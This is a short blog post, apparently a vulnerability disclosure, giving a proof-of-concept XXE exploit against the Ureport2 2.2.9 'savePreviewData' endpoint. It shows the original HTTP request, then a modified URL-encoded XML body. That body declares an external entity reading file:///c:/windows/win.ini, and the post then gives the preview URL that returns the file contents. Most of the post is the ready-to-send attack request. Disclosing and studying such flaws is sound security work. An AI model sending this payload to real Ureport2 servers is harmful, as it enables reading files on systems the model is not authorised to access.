Ureport2 "savePreviewData" Endpoint XXE

Ureport2 “savePreviewData” Endpoint XXE

Setting up the environment

Download Spring Boot 2 and Ureport 2.2.9 via Maven. pomxml

Configuring Ureport2 Servlet. UReportConfig

Browse the designer page. BrowsePage

POC

Try to preview the data. preview-button

Modify the request data sent to savePreviewData. savePreviewData

Raw:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

POST /ureport/designer/savePreviewData HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 5569
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Chromium";v="139", "Not;A=Brand";v="99"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/ureport/designer
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=92753162E993D1A4CAD989B0141164BA
Connection: keep-alive

content=%253C%253Fxml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%253Cureport%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522A1%2522%2520row%253D%25221%2522%2520col%253D%25221%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255Btest%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522B1%2522%2520row%253D%25221%2522%2520col%253D%25222%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522C1%2522%2520row%253D%25221%2522%2520col%253D%25223%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522D1%2522%2520row%253D%25221%2522%2520col%253D%25224%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522A2%2522%2520row%253D%25222%2522%2520col%253D%25221%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522B2%2522%2520row%253D%25222%2522%2520col%253D%25222%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522C2%2522%2520row%253D%25222%2522%2520col%253D%25223%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522D2%2522%2520row%253D%25222%2522%2520col%253D%25224%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522A3%2522%2520row%253D%25223%2522%2520col%253D%25221%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522B3%2522%2520row%253D%25223%2522%2520col%253D%25222%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522C3%2522%2520row%253D%25223%2522%2520col%253D%25223%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522D3%2522%2520row%253D%25223%2522%2520col%253D%25224%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Crow%2520row-number%253D%25221%2522%2520height%253D%252218%2522%252F%253E%253Crow%2520row-number%253D%25222%2522%2520height%253D%252218%2522%252F%253E%253Crow%2520row-number%253D%25223%2522%2520height%253D%252218%2522%252F%253E%253Ccolumn%2520col-number%253D%25221%2522%2520width%253D%252280%2522%252F%253E%253Ccolumn%2520col-number%253D%25222%2522%2520width%253D%252280%2522%252F%253E%253Ccolumn%2520col-number%253D%25223%2522%2520width%253D%252280%2522%252F%253E%253Ccolumn%2520col-number%253D%25224%2522%2520width%253D%252280%2522%252F%253E%253Cpaper%2520type%253D%2522A4%2522%2520left-margin%253D%252290%2522%2520right-margin%253D%252290%2522%250A%2520%2520%2520%2520top-margin%253D%252272%2522%2520bottom-margin%253D%252272%2522%2520paging-mode%253D%2522fitpage%2522%2520fixrows%253D%25220%2522%250A%2520%2520%2520%2520width%253D%2522595%2522%2520height%253D%2522842%2522%2520orientation%253D%2522portrait%2522%2520html-report-align%253D%2522left%2522%2520bg-image%253D%2522%2522%2520html-interval-refresh-value%253D%25220%2522%2520column-enabled%253D%2522false%2522%253E%253C%252Fpaper%253E%253C%252Fureport%253E

Modified:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

POST /ureport/designer/savePreviewData HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 5049
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Chromium";v="139", "Not;A=Brand";v="99"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/ureport/designer
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=92753162E993D1A4CAD989B0141164BA
Connection: keep-alive

content=%253C?xml%2520version=%25221.0%2522%2520encoding=%2522UTF-8%2522?%253E%253C!DOCTYPE%2520foo%2520%255B%253C!ELEMENT%2520foo%2520ANY%2520%253E%253C!ENTITY%2520xxe%2520SYSTEM%2520%2522file:///c:/windows/win.ini%2522%253E%255D%253E%253Cureport%253E%253Ccell%2520expand=%2522None%2522%2520name=%2522A1%2522%2520row=%25221%2522%2520col=%25221%2522%253E%253Ccell-style%2520font-size=%252210%2522%2520align=%2522center%2522%2520valign=%2522middle%2522%253E%253C/cell-style%253E%253Csimple-value%253E%26xxe;%253C/simple-value%253E%253C/cell%253E%253Ccell%2520expand=%2522None%2522%2520name=%2522B1%2522%2520row=%25221%2522%2520col=%25222%2522%253E%253Ccell-style%2520font-size=%252210%2522%2520align=%2522center%2522%2520valign=%2522middle%2522%253E%253C/cell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C/simple-value%253E%253C/cell%253E%253Ccell%2520expand=%2522None%2522%2520name=%2522C1%2522%2520row=%25221%2522%2520col=%25223%2522%253E%253Ccell-style%2520font-size=%252210%2522%2520align=%2522center%2522%2520valign=%2522middle%2522%253E%253C/cell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C/simple-value%253E%253C/cell%253E%253Ccell%2520expand=%2522None%2522%2520name=%2522D1%2522%2520row=%25221%2522%2520col=%25224%2522%253E%253Ccell-style%2520font-size=%252210%2522%2520align=%2522center%2522%2520valign=%2522middle%2522%253E%253C/cell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C/simple-value%253E%253C/cell%253E%253Ccell%2520expand=%2522None%2522%2520name=%2522A2%2522%2520row=%25222%2522%2520col=%25221%2522%253E%253Ccell-style%2520font-size=%252210%2522%2520align=%2522center%2522%2520valign=%2522middle%2522%253E%253C/cell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C/simple-value%253E%253C/cell%253E%253Ccell%2520expand=%2522None%2522%2520name=%2522B2%2522%2520row=%25222%2522%2520col=%25222%2522%253E%253Ccell-style%2520font-size=%252210%2522%2520align=%2522center%2522%2520valign=%2522middle%2522%253E%253C/cell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C/simple-value%253E%253C/cell%253E%253Ccell%2520expand=%2522None%2522%2520name=%2522C2%2522%2520row=%25222%2522%2520col=%25223%2522%253E%253Ccell-style%2520font-size=%252210%2522%2520align=%2522center%2522%2520valign=%2522middle%2522%253E%253C/cell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C/simple-value%253E%253C/cell%253E%253Ccell%2520expand=%2522None%2522%2520name=%2522D2%2522%2520row=%25222%2522%2520col=%25224%2522%253E%253Ccell-style%2520font-size=%252210%2522%2520align=%2522center%2522%2520valign=%2522middle%2522%253E%253C/cell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C/simple-value%253E%253C/cell%253E%253Ccell%2520expand=%2522None%2522%2520name=%2522A3%2522%2520row=%25223%2522%2520col=%25221%2522%253E%253Ccell-style%2520font-size=%252210%2522%2520align=%2522center%2522%2520valign=%2522middle%2522%253E%253C/cell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C/simple-value%253E%253C/cell%253E%253Ccell%2520expand=%2522None%2522%2520name=%2522B3%2522%2520row=%25223%2522%2520col=%25222%2522%253E%253Ccell-style%2520font-size=%252210%2522%2520align=%2522center%2522%2520valign=%2522middle%2522%253E%253C/cell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C/simple-value%253E%253C/cell%253E%253Ccell%2520expand=%2522None%2522%2520name=%2522C3%2522%2520row=%25223%2522%2520col=%25223%2522%253E%253Ccell-style%2520font-size=%252210%2522%2520align=%2522center%2522%2520valign=%2522middle%2522%253E%253C/cell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C/simple-value%253E%253C/cell%253E%253Ccell%2520expand=%2522None%2522%2520name=%2522D3%2522%2520row=%25223%2522%2520col=%25224%2522%253E%253Ccell-style%2520font-size=%252210%2522%2520align=%2522center%2522%2520valign=%2522middle%2522%253E%253C/cell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C/simple-value%253E%253C/cell%253E%253Crow%2520row-number=%25221%2522%2520height=%252218%2522/%253E%253Crow%2520row-number=%25222%2522%2520height=%252218%2522/%253E%253Crow%2520row-number=%25223%2522%2520height=%252218%2522/%253E%253Ccolumn%2520col-number=%25221%2522%2520width=%252280%2522/%253E%253Ccolumn%2520col-number=%25222%2522%2520width=%252280%2522/%253E%253Ccolumn%2520col-number=%25223%2522%2520width=%252280%2522/%253E%253Ccolumn%2520col-number=%25224%2522%2520width=%252280%2522/%253E%253Cpaper%2520type=%2522A4%2522%2520left-margin=%252290%2522%2520right-margin=%252290%2522%250A%2520%2520%2520%2520top-margin=%252272%2522%2520bottom-margin=%252272%2522%2520paging-mode=%2522fitpage%2522%2520fixrows=%25220%2522%250A%2520%2520%2520%2520width=%2522595%2522%2520height=%2522842%2522%2520orientation=%2522portrait%2522%2520html-report-align=%2522left%2522%2520bg-image=%2522%2522%2520html-interval-refresh-value=%25220%2522%2520column-enabled=%2522false%2522%253E%253C/paper%253E%253C/ureport%253E

modified

Finally, request http://127.0.0.1:8080/ureport/preview?_u=p.

boom

CVE
Licensed under CC BY-NC-SA 4.0
© 2019 - 2025 Chocolate's 废纸篓
Built with Hugo
Theme Stack designed by Jimmy